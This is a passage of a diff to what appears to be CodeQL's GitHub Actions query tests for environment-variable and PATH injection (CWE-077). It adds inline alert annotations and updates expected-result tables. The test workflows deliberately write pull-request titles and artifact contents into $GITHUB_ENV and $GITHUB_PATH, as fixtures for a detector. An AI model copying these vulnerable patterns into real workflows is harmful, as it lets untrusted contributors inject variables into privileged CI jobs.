Source[actions/envvar-injection/critical] run: | foo=$(cat ./artifacts/parent-artifacts/event.txt) - echo "foo=$foo" >> $GITHUB_ENV + echo "foo=$foo" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 1 run: | - echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 2 run: | - echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml index 3ed80374ef6..6f7d3b9cffc 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -24,7 +24,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/envvar-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -38,4 +38,4 @@ jobs: fi echo "pr_num=$pr_num" >> $GITHUB_ENV - echo "ref=$ref" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index f544994fc5c..398a8013173 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,3 +1,9 @@ +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -16,9 +22,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref index 80f72124fe4..01345ebb915 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionCritical.ql +query: Security/CWE-077/EnvPathInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index 5be9f729ad6..d18365265b8 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -16,4 +17,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref index 165a3d20896..e61216acaa4 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionMedium.ql +query: Security/CWE-077/EnvPathInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9914ae91df1..85035023f66 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,3 +1,40 @@ +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | 